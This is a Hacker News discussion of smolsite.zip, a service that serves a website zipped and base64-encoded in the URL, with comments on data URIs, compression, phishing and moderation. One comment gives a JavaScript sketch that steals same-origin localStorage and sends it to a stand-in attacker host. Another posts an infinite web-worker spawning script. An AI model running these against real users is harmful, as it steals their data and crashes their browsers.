Show HN: Host a Website in the URL

smolsite.zip

602 points by acidx 2 years ago · 195 comments

I wrote this silly thing a couple of weeks ago. It's absolutely useless but it's a fun tech demo for my web server library. Enjoy!

Lerc 2 years ago

Neat

https://smolsite.zip/UEsDBBQAAgAIAFtLJ1daaE7RlwIAAN4EAAAKAAA...

dmazzoni 2 years ago

Just in case anyone doesn't already know, you can do that with a data uri as well:

data:text/html,<h1>My%20small%20website</h1><p>Look,%20it's%20real!</p>

You can use a data uri generator to base64-encode it, if you want.
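For illustration, a tiny sketch of building that kind of data URI yourself in plain JavaScript (note btoa only handles Latin-1, so real pages may need a UTF-8 step first):

```
// Base64-encode a small HTML page into a data: URI
const html = '<h1>My small website</h1><p>Look, it\'s real!</p>';
const uri = 'data:text/html;base64,' + btoa(html);
console.log(uri); // paste into the address bar or use as an <a href>
```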

Advantages of smolsite:

- Zip might let you fit a bit more than a data uri

- Some JS APIs would work on a smolsite url, but wouldn't work in a data uri

geonnave 2 years ago

On the subject of weird stuff on a URL, here is a prime dog: https://geonnave.github.io/primg/#17976931348623159077293051...

wgx 2 years ago

My response in a URL:

https://wgx.github.io/anypage/?eyJoMSI6IkhlbGxvIEhOISIsImgyI...

SushiHippie 2 years ago

Nice, reminds me of nopaste [0], which is a pastebin that stores the text in the url compressed with lzma and encoded with base64.

[0] https://nopaste.boris.sh/

dspillett 2 years ago

That will send the content to the server for unpacking. A slightly more convoluted option might be to put the zip in the anchor part instead and have the response serve code to unpack it from there client side. Though now the server can't scan for damaging content being sent via it, even if it wanted to, as the anchor part does not get sent to the server.
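For illustration, a rough client-side sketch of that idea, assuming a zip-in-the-fragment URL and an unzip library such as fflate (none of this is smolsite's actual code):

```
import { unzipSync, strFromU8 } from 'fflate';

// e.g. https://example.test/#<base64 zip>; the fragment never reaches the server
const b64 = location.hash.slice(1);
const bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));

// Unpack entirely in the browser
const files = unzipSync(bytes); // { "index.html": Uint8Array, ... }
document.documentElement.innerHTML = strFromU8(files['index.html']);
```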

  • cnity 2 years ago

    I thought the same thing (though you could do it without anchors as long as the static content server used a glob for routing all traffic to the same web page). It would really simplify hosting.

debarshri 2 years ago

this is really cool and I think it feels like what Show HN should be, instead of a marketing ploy for other orgs pushing their product.

  • hsbauauvhabzb 2 years ago

    I love this type of stuff too, but be aware ycombinator is a startup incubator - people showing off their wares is presumably encouraged, up to a point.

  • matheusmoreira 2 years ago

    I don't think it qualifies as advertising. People come to Hacker News to see what hackers are working on. It's certainly a major reason why I come here.

    Every Show HN post I've seen was interesting. Motivated me to start my own projects and polish them so I can show them here. It's a really good feeling when someone else submits your work and you get to talk about it.

  • mathgeek 2 years ago

    Do you get the impression that novel Show HNs are pushed out by the more corporate ones?

  • fouc 2 years ago

    yeah and that's why interesting show HNs get upvoted

GMoromisato 2 years ago

I had an idea once to implement Borges's Library of Babel just like this: all the text is in the URL. With more sophisticated encoding, you can optimize English words. Then hook it up to a "search system" so you can search for your own name, clips of text, etc.

Eventually you'd hit the URL size limit, of course, but maybe we add a layer on top for curators to bundle sets of URLs together to produce larger texts. Maybe add some LLM magic to generate the bundles.

You'd end up with a library that has, not just every book ever written, but every book that could ever be written.

[Just kidding, of course: I know this is like saying that Notepad already has every book in existence--you just have to type them in.]

alpb 2 years ago

Previously posted similar work

https://news.ycombinator.com/item?id=34312546

https://news.ycombinator.com/item?id=2464213

  • joe5150 2 years ago

    The comment in the first link about Yahoo embedding a giant b64-encoded JSON object in the URL reminds me of something horrible I did in a previous job.

    To get around paying our website vendor (think locked-down hosted CMS) for an overpriced event calendar module, I coded a public page that would build a calendar using a base64-encoded basic JSON "events" schema embedded in a "data-events" attribute. Staff would use a non-public page that would pull the existing events data from the public page to prepopulate the calendar builder, which they could then use to edit the calendar and spit out a new code snippet to put on the public page. And so on.

    It basically worked! But I think they eventually did just fork over the money for the calendar add-on.

    • tomcam 2 years ago

      Wait what was horrible about it?

      • joe5150 2 years ago

        Mostly just the DIV with a giant string of base64-encoded JSON in a data attribute that looked pretty ugly. Website visitors were of course basically none the wiser if it all worked.
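        For illustration, the shape of that trick in plain JavaScript (the names and schema here are made up, not the vendor page's actual markup):

        ```
        // What the internal "calendar builder" page would emit for staff to paste in:
        const events = [{ date: '2023-09-07', title: 'Board meeting' }];
        const snippet = `<div id="calendar" data-events="${btoa(JSON.stringify(events))}"></div>`;

        // What the public page's script would do on load:
        const el = document.getElementById('calendar');
        const decoded = JSON.parse(atob(el.dataset.events));
        decoded.forEach(ev => { /* render each event into the calendar markup */ });
        ```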

  • rpastuszak 2 years ago

    Can't find the HN link now, but here's the "Twitter CDN" project I posted a few years back (base64+gzip data URIs):

    https://sonnet.io/projects#:~:text=Laconic!%20(a%20Twitter%2...

ihaveajob 2 years ago

This is hilarious, but I think it may have some practical applications. Watch out for hackers though.

  • grepfru_it 2 years ago

    I immediately thought this is a great way to ship malicious payloads to an unsuspecting party. A good WAF would block it as sus, but a few tricks could probably get around that as well

    • anamexis 2 years ago

      How is it different from any webpage in that regard?

      • misterbwong 2 years ago

        The difference is that the contents of this website can be crafted by the attacker directly via the URL without having to do anything to the host.

        • anamexis 2 years ago

          How is that a meaningful attack vector, unique from webpages in general?

          • ddtaylor 2 years ago

            In this exact context it's likely not a problem, but essentially this is a ready-to-go XSS attack. As far as I can tell there are no CORS or domain-level protections, so an "attacker" here could easily do anything with any client-side data being used by any other "site" on the domain.

            Let's say I make a little chat app that stores some history or some other data in local browser storage or cookies. Any other site can just as easily access all of that information. An "attacker" could link you to a modified version of the chat site that relays all of your messages to their server while still making it otherwise look like the normal chat. It would also retain any client-side information you had previously entered, like your nickname or chat history, since it's stored in local storage.

            Most of the time, sanitizing input (like ensuring users don't have HTML in their names or comments), combined with domain-level separation and CORS policies, ensures that one site can't do things that "leak" into another. It's the reason that, most of the time, no matter how badly people mess things up, Facebook getting hacked in your browser doesn't compromise your Google account.
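            To make that concrete, here is a sketch of what any uploaded zip could run, given that every "site" shares the one origin (the storage keys and attacker URL are hypothetical):

            ```
            // Runs inside a malicious zip served from the same origin as the chat app,
            // so it sees the same localStorage, cookies, etc.
            const stolen = {
              nick: localStorage.getItem('chat-nickname'),   // hypothetical keys another
              history: localStorage.getItem('chat-history'), // "site" on the domain stored
            };
            // Exfiltrate however you like, e.g. via an image beacon:
            new Image().src = 'https://attacker.example/log?d=' +
              encodeURIComponent(JSON.stringify(stolen));
            ```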

            • rainonmoon 2 years ago

              Intrepid web developers reading this comment, please note that CORS is not, in fact, a protection mechanism. It's a way to relax the Same Origin Policy which is actually the protection relevant here. You don't need a CORS policy to protect a site from cross-site attacks, you need no CORS policy. Go ahead and make your little chat app, you're not at risk of having your messages stolen because of a lack of CORS headers.

              • todd3834 2 years ago

                Perhaps they meant CSP

                • ddtaylor 2 years ago

                  I did say it wrong, but my point was that the site doesn't segment off each "site" into a different subdomain or any other ruleset that would allow the same origin policy to restrict access.

                  As it is with this site, the messages can get "stolen" by any other site on the same domain, which can be anything since anyone can upload one and direct a victim to them.

            • rmbyrro 2 years ago

              But then the attacker URL will be different.

              That doesn't look like a new attack vector; this is called phishing, isn't it?

              XSS means you can inject and persist code in a webpage while keeping the same URL accessed by other users.

              If you create a bigbank-fake.com and copy a manipulated version of bigbank.com's HTML, this is not XSS.

          • Syntaf 2 years ago

            1. Find an existing smol site being shared around

            2. Modify the parameters to hijack any relevant content

            3. Reshare the smol site with your changes under the guise that it's the original link

            • anamexis 2 years ago

              That’s not novel. You could say the same thing for a GitHub Pages page, or a Code Sandbox, or an S3 static site, or really anything.

              The only reason that would be a threat is if you implicitly trusted smolsite.zip, which would be an odd thing to do.

              • pcthrowaway 2 years ago

                GitHub Pages uses a unique subdomain per user to prevent sites from loading each other's cookies, localstorage, service workers, etc.

              • ncruces 2 years ago

                The difference is that if GitHub is found distributing malware on GitHub pages, you can notify them, they verify it, take it down, and open a process to eventually ban the offender.

                They expend enough effort on this to ensure the vast majority of content on GitHub Pages is not malware, and to avoid getting blanket-flagged as such.

                It's not clear if smolsite.zip can successfully set up a similar process, given that they'll serve just any zip that's in the URL, and they won't have the manpower to verify takedown requests.

                • anamexis 2 years ago

                  If your security model relies on arbitrary hosts on the internet proactively taking down malicious URLs, you're in for a bad time.

                  • ncruces 2 years ago

                    My security model is not going to do smolsite.zip any good when quad9, 1.1.1.2, et al. decide to outright block the domain.

                    Also, cookies.

            • rmbyrro 2 years ago

              That's a known attack vector called phishing, no? Any website can be phished, not just smolsites

mazokum 2 years ago

Reminded me of a site from the creator of Advent of Code for sharing solutions to the puzzles (or any plaintext, for that matter).

https://github.com/topaz/paste

senseiV 2 years ago

Nice!

I remember seeing this for the first time on HN with urlpages, which inspired me to build my own version of these

https://js-labs.js.org/

grimgrin 2 years ago

excellent!

and my website _is_ already in a zip hehe https://redbean.dev

Ndymium 2 years ago

Cool little project! I did a similar thing recently, I wrote a pastebin that puts the file contents in the URL with brotli. [0]

It works quite well, but I'll need to update the syntax highlighting soon, as at least Gleam is out of date (boy, that language moves fast), and sometimes brotli-wasm throws a memory allocation error for some reason. I guess that's one cool thing that WASM brought to the table: memory handling issues.

[0] https://nicd.gitlab.io/t/

high_byte 2 years ago

you could save yourself from serving all the websites (and server costs) with just one character! pass the base64 in the hash field by simply prepending # to it. also it seems the URL length limits do not include the hash, so maybe notsosmolsite.zip? ;)

netcraft 2 years ago

This reminds me of this project: http://ephemeralp2p.durazo.us/2bbbf21959178ef2f935e90fc60e5b...

Myself and two other people have literally kept this page alive for many years - the github repo says 2017.

  • dang 2 years ago

    https://news.ycombinator.com/item?id=37410630 is fun but it's too much of a follow-up* to the current thread. If you get in touch with us at hn@ycombinator.com after some time (say a month or two, to flush the hivemind caches), we'll send you a repost invite.

    * https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...

    • netcraft 2 years ago

      Ok, cool. I'm not sure I understand the issue though; this thread reminded me of that page, so I thought other people might be interested in it too. There wasn't much conversation here, and it felt like this was somewhat off-topic on this page anyway.

  • hattmall 2 years ago

    It's neat, but it's like P2P with double the bandwidth.

  • acidxOP 2 years ago

    Oh, this is a cool experiment!

    • netcraft 2 years ago

      It's been very interesting over the years. Myself and these other folks have this connection, but no way to communicate or even know who they are.

      • sweetjuly 2 years ago

        It doesn't seem like the client actually verifies that the content it got back matches the SHA256 it requested, so in theory if you really wanted to meet them you could start sending an updated website with details on how to get in contact with you. Though that'd ruin the magic of it, I'd bet :)

low_tech_punk 2 years ago

Take it to the next level, maybe switch from server side zip to browser native gzip?

1. You could achieve this on a static server, like GitHub pages

2. You could make the page editable and auto generate new URLs as the page gets edited.

See:

https://developer.mozilla.org/en-US/docs/Web/API/Compression...
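For example, a minimal sketch of that API producing a URL-safe payload in the browser (the helper name here is made up):

```
// Gzip a string with the native CompressionStream, then base64url-encode it.
async function compressToFragment(text) {
  const stream = new Blob([text]).stream().pipeThrough(new CompressionStream('gzip'));
  const bytes = new Uint8Array(await new Response(stream).arrayBuffer());
  return btoa(String.fromCharCode(...bytes)) // fine for small payloads
    .replaceAll('+', '-').replaceAll('/', '_').replace(/=+$/, '');
}

// e.g. location.hash = await compressToFragment('<h1>hello</h1>');
// A matching DecompressionStream('gzip') reverses it on page load.
```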

vanderZwan 2 years ago

I did something like this last year (maybe two years ago by now? time flies), but with LZString instead of gzip[0]. The original idea was actually someone else's on Mastodon (who knows, maybe it was OP? I think it was Ramsey Nassr though), but it was just B64 at first - I added the compression.

Then someone tried fitting King Lear in there (which worked).

Then it turned out that, until that day (but not for very long after), URLs were not counted toward the character limit in Mastodon toots.

That froze quite a few Mastodon clients unlucky enough to open that toot, for a day or two until it got fixed. Not sure why; I'm guessing (accidentally) quadratic algorithms that weren't counting on URLs multiple kilobytes in length.

[0] https://blindedcyclops.neocities.org/onlinething/writer

Theodores 2 years ago

Conceivably this can be done with Brotli too.

I like embedding external resources such as bitmap images in SVG in CSS in HTML so that a document is truly portable and can be sent by email or messenger services. So I don't need a URL. The whole document has to be shared, not just a link to it.

I also found the favicon can be encoded in this way.

I don't do scripts, but a lot of fun can be had with HTML when you start doing unusual things with it. For CSS I also use my own units, just for fun. So no pixels, ems or points, but something else... CSS variables make this possible. I like to use full semantic elements and have minimal classes, styling the elements. This should confuse the front end developer more used to the 'painting by numbers' approach of typical website frontend work.

  • Y_Y 2 years ago

    Sounds cool, can you link an example?

    • Theodores 2 years ago

      Soon...

      I just work from the HTML specs and go my own way. There is something I am working on that 'needs' this stuff. I see HTML as a creative medium and I wanted to solve problems such as internal document navigation - rather than hundreds of web pages, compile the lot into one.

      The PWA takes an entirely different approach to what I am trying to do. I like the PWA approach but I want one file that can be moved or emailed, to be available offline.

      I found that making all the images inline worked for me. I got best results with webp rather than avif but don't care about losing the size benefits with base64 encoding - once zipped those compress nicely.

MattyRad 2 years ago

Very cool! I have a similar project that uses DNS instead of a path parameter https://serv.from.zone but smolsite is much simpler.

stolenmerch 2 years ago

See also: https://itty.bitty.site/

quickthrower2 2 years ago

I like how it requires sending all the data up to the server, where I guess it gets discarded, and returns a static HTML page that converts that same data into a web page on the client.

Has the advantages of being centralized (site can be shut down, nuking all URLs) and decentralized (requires tech skills to set up, site cannot be updated without changing the URL, etc.). Adding tinyurl to this as suggested in another comment takes it to the next level!

Helmut10001 2 years ago

I wonder about the liability for content on these URL-websites. Is the liability now on the one who shares the URL, or on the one who serves it?

resonious 2 years ago

I see this a lot. Some unsolicited advice: you don't need cat for this kind of command:

    echo "https://smolsite.zip/`cat somesite.zip | base64 --wrap 0`"
can become

    echo "https://smolsite.zip/`base64 --wrap 0 < somesite.zip`"
Really awesome project nonetheless!

ngc6677 2 years ago

Also having fun with this subject at https://goog.space/: trying to add WebRTC and yjs, plus archive.is for storing a link (and minification). Fun to see so many people trying things out with URLs, client-side web apps, and encoding/decoding data

rambambram 2 years ago

You not only wrote this "silly thing", you also host it on your self-built server? Wow!

wmab 2 years ago

Some images in Google image search results have base64 data in their thumbnail URLs. Does anyone have any idea why?

Search "Pepsi can" and for some results, right click > copy image address will give "data:image/jpeg;base64,/.../" instead of the website's image. Presumably to limit server cost / make the browser do the rendering? It's not for all sites; for more common sites (Walmart, for example) it gives the correct image URL.

Pepsi can image from:

[1] https://crescentmarket.shop/ data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2...//9k=

[2] But when you click through: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQwXbLG...

[3] Paperpunchplus.com shows the correct image URL https://www.paperpunchplus.com/https://cdn3.evostore.io/prod...

  • jstarfish 2 years ago

    Specifically for a gallery page of search results, I'd guess that it's to provide a more-consistent experience.

    When you load that results page, you'd be reaching out to ~100+ different domains that will respond and render the images at different rates (and some will fail to load at all). Base64-encoding lets you shove binary content into caches like Redis, retrieval and embedding of which would be preferable to hotlinking to a slow site. Then most of the page gets rendered at the same time client-side.

Tade0 2 years ago

I still have control over the domain I bought a few years ago to implement something similar.

What ultimately stopped me is that on a site of this type you can't really include links to other sites made the same way, because your URL length is going to balloon.

chrisvxd 2 years ago

Absolutely useless fun tech demos are the best kind of demos

https://github.com/lpereira/lwan - presume this is the web server library you're referring to? Very cool.

  • acidxOP 2 years ago

    Yes, that's the library! It's something I've been slow cooking for over 10 years at this point. :)

koito17 2 years ago

Coolest application of data URLs I've ever seen. It's amazing how simple this idea is, yet I have NEVER considered trying it out. I'm not surprised this idea has already been done before, but somehow it still never crossed my mind.

HeavyStorm 2 years ago

I can't do it right now, but think of this: we can then create a site that, upon some input, creates a zip file and links to itself, in a possibly infinite loop of self-generating websites!

SoulMan 2 years ago

I sometimes use this https://github.com/topaz/paste

adrianomartins 2 years ago

Amazing! The internet never ceases to surprise.

v_ignatyev 2 years ago

Let's see how people in future will trick Neuralink to host websites in others' heads.

klntsky 2 years ago

Would it be possible to fit webtorrent in?

giuliomagnifico 2 years ago

This is very cool, thanks for sharing!

meiraleal 2 years ago

It is not useless, it is very cool. But the website is hosted on a server, not in the URL.

lagniappe 2 years ago

how does it react to a zip bomb?

  • pmarreck 2 years ago

    "Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not."

    https://www.bamsoftware.com/hacks/zipbomb/

  • whoomp12342 2 years ago

    2000 bytes limit

    • pcthrowaway 2 years ago

      Which is enough to store any content (unzipped, it just needs to contain a link to the next chunk)

    • DriverDaily 2 years ago

      Plenty of room for a recursive function with no base case

      • grepfru_it 2 years ago

        You're not getting very far on 2k bytes. A 10k file expands to 10 MB and will likely time out if the author's web host has configured proper limits

        • acidxOP 2 years ago

          Files are not decompressed on the server: it sends the unmodified deflate stream back to the user.

        • DriverDaily 2 years ago

          Wouldn't infinitely spawning web workers do the same thing as a zip bomb?

          ```
          <script>
            const workerBlob = new Blob(
              ['while (true) { console.log("this is a worker that will never stop") }'],
              { type: 'application/javascript' }
            )
            const workerBlobURL = URL.createObjectURL(workerBlob)
            while (true) { new Worker(workerBlobURL) }
          </script>
          ```

xxdesmus 2 years ago

I look forward to the phishing. Hopefully you can block known bad hashes.

masukomi 2 years ago

cool. alas, i've got all .zip domains blocked because the vast majority of them are used by malware people trying to trick someone into "downloading a zip file"

(this was so predictable)

expertentipp 2 years ago

How do I get a salaried job doing cool hackery stuff like this?

  • matheusmoreira 2 years ago

    Let us know if you find out the answer. Closest I can think of is to try to be so impossibly awesome that you get sponsors at GitHub.

danpalmer 2 years ago

This is a fun hack, nice one.

Thinking of reasons not to do this, though: it's effectively impossible to moderate the content, at least without building a database of all the content you don't want to host.

  • johnnyworker 2 years ago

    Make it purely client side JS and use URL fragments -> host (and receive) nothing.

    • danpalmer 2 years ago

      That's even worse. The issue is not that you have the bytes, it's that users see the content on your site. The less control you have the more difficult it would be to meet legal obligations surrounding user generated content.

      The deal made years ago in law in the US (and followed around the world) is that websites are not liable for the user generated content that they make available, as long as they remove it if requested for legitimate reasons. These two components go hand in hand. If a website is unable to remove content, it's effectively liable for that content. This basically breaks the web as we know it today.

klntsky 2 years ago

Base64 is far from being efficient for this use case

  • pmarreck 2 years ago

    Base122 or whatever the other option is (and I'm sure there are others), which tries to take advantage of the whole UTF-8 space, and probably wouldn't even work on URLs, is only something like 15% denser. Obviously, you're limited to printable characters, here.

lwansbrough 2 years ago

Like pastebin, but instead of text it’s a 0-day!

nvr219 2 years ago

geez allowing the .zip tld was such a bad idea

markburns 2 years ago

Needs to support DMCA takedown notices

4RealFreedom 2 years ago

This is so much fun! Great idea!

mixeden 2 years ago

This is genius

HeavyStorm 2 years ago

Very cool concept!!

Modified3019 2 years ago

But can it fit DOOM?

ShakirWorks 2 years ago

God bless internet

adibalcan 2 years ago

Really cool

m00dy 2 years ago

would be useful with a URL shortener.

  • thih9 2 years ago

    You can use an external one.

    In which case it would also be your hosting provider.

py4 2 years ago

Pretty cool!

MoElmredi 2 years ago

isn't there a size limit?

matt3210 2 years ago

So smol!!

rpastuszak 2 years ago

Nice! I did something similar a few years back too!

I called it the Twitter CDN™ [1]

Here's Pong and The Epic of Gilgamesh, in a Tweet: https://twitter.com/rafalpast/status/1316836397903474688

Here's the editor: https://laconic.sonnet.io/editor.html

And here's the article explaining how it works: https://laconic-mu.vercel.app/index.html?c=eJylWOuS27YV%2Fu%...

[1] all thanks to the fact that Twitter applies a different char limit to URLs. We wouldn't want to lose those delicious tracking params, would we?

porsager 2 years ago

Yeah, I had exactly that, but in my opinion better, with fullscreen mode on https://flems.io. Right up until hackers found it was a great place to host their phishing sites...

  • mattbgates 2 years ago

    I created a website years ago that let anyone come and just "post" something online anonymously, quick notes or whatever, but I've since had to add a registration process and record IP addresses, as the website was overrun by what looked like Russian hackers and the dark web in general looking for a place to, uh... post links to child... well, anyways, it took me almost a month to track down all my own website links, as everything was encrypted and growing faster than I could delete it. Def sucks to know that even though I took down their means to 'conduct business', they will continue to find other websites.

  • acidxOP 2 years ago

    That's why we can't have nice things. :(

  • fouc 2 years ago

    Oh so you basically prevent fullscreen mode? Not bad! The average user of flems probably doesn't need fullscreen after all.

rtcode_io 2 years ago

We host the full https://RTCode.io playground state in the hash, deploy it to https://RTEdge.net and serve the output at / and the playground at /?

- <https://RTEdge.net/> output

- <https://RTEdge.net/?> playground

For more information: https://efn.kr

  • pmarreck 2 years ago

    wow, this is some interesting web voodoo! What about auth?

    • rtcode_io 2 years ago

      Auth is handled in the playground. We offer "Sign in with GitHub, Google, Microsoft, Facebook, and Apple". Anyone can see the code with /? but only the owner(s) can (re-)deploy it.

      ---

      There is also service worker support which deploys as a Cloudflare Worker!

      See <https://sw.rt.ht/?> -> https://sw.rt.ht

madacol 2 years ago

If the author decides to use the URL hash instead, he can avoid users sending that zip to his server

i.e.

   https://smolsite.zip/#UEsDBB...

  • mholt 2 years ago

    I'm guessing the code to read the zip file is server-side, but I guess JS could do it too.

    • madacol 2 years ago

      Yeah, server-side is much easier to code. But it should be doable with JS

      I've already built a website that reads zip files client-side with JS here: https://madacol.github.io/ozempic-dicom-viewer/ . It will read the zip file and search for MRI/CT scan images to display

      Where I have doubts is how to reference external files from the main `index.html` file. I know you can load files as blobs and get a URL (I did that in my website above), but I am not sure if that will work as references in the <head>
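      One way to approach that, as a rough sketch (assuming the zip has already been unpacked client-side into a name-to-bytes map, e.g. with fflate): make a blob URL per entry and naively rewrite references in the HTML before handing it to the document. Whether <head> resources like stylesheets pick the blob URLs up depends on when the rewrite happens relative to parsing.

      ```
      import { strFromU8 } from 'fflate';

      // `files` is assumed to be { "index.html": Uint8Array, "style.css": ..., ... }
      const urls = {};
      for (const [name, bytes] of Object.entries(files)) {
        urls[name] = URL.createObjectURL(new Blob([bytes]));
      }

      // Naive textual rewrite of references to bundled files, then inject the page.
      let html = strFromU8(files['index.html']);
      for (const [name, url] of Object.entries(urls)) {
        html = html.replaceAll(`"${name}"`, `"${url}"`);
      }
      document.open();
      document.write(html);
      document.close();
      ```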

  • acidxOP 2 years ago

    Then it would require JavaScript and wouldn't be a nice demonstration for my web server library. :)

    • madacol 2 years ago

      You said in another comment that the files are not decompressed on the server. Then if you don't require JS, where is the decompression happening?

      • acidxOP 2 years ago

        On the client.

        Data is already stored in the ZIP file deflated, so I can just send whatever is inside the ZIP file back to the client if they accept that encoding (which is pretty much always the case, given how ubiquitous deflate is).

        The server parses the ZIP file and stores that information in a hash table for quicker lookup but it's otherwise not decompressing anything. This hash table is kept for a few minutes to avoid having to decode the base64-encoded data and parse the ZIP file for every request.

        • madacol 2 years ago

          That's nice!

          So decompression is happening on the client, but not at the JS level; instead you're taking advantage of the browser's ability to accept compressed content from the server, so decompression is done by the browser's own behavior when it receives a "content-encoding: gzip" stream or something like that.
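          A rough Node-style sketch of that trick (not the author's lwan/C code): a zip entry stores raw DEFLATE bytes plus the CRC-32 and uncompressed size, which is exactly what a gzip container needs, so a server can wrap the entry without ever decompressing it. `lookupEntry` is hypothetical, standing in for parsing the base64 zip out of the URL.

          ```
          const http = require('http');

          // Wrap a zip entry's raw DEFLATE bytes in a minimal gzip container.
          function gzipWrap(rawDeflate, crc32, uncompressedSize) {
            const header = Buffer.from([0x1f, 0x8b, 8, 0, 0, 0, 0, 0, 0, 0xff]); // magic, CM=deflate
            const trailer = Buffer.alloc(8);
            trailer.writeUInt32LE(crc32 >>> 0, 0);            // CRC-32, copied from the zip header
            trailer.writeUInt32LE(uncompressedSize >>> 0, 4); // ISIZE, copied from the zip header
            return Buffer.concat([header, rawDeflate, trailer]);
          }

          http.createServer((req, res) => {
            const entry = lookupEntry(req.url); // hypothetical: { data, crc32, size }
            res.writeHead(200, { 'Content-Type': 'text/html', 'Content-Encoding': 'gzip' });
            res.end(gzipWrap(entry.data, entry.crc32, entry.size));
          }).listen(8080);
          ```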

  • globalise83 2 years ago

    Use hash and avoid unnecessary work - good advice dude!

gildas 2 years ago

Alternatively, when formatted "properly", you can also simply host your zip file. See https://gildas-lormeau.github.io/ for example.

rswskg 2 years ago

Literally designed around XSS
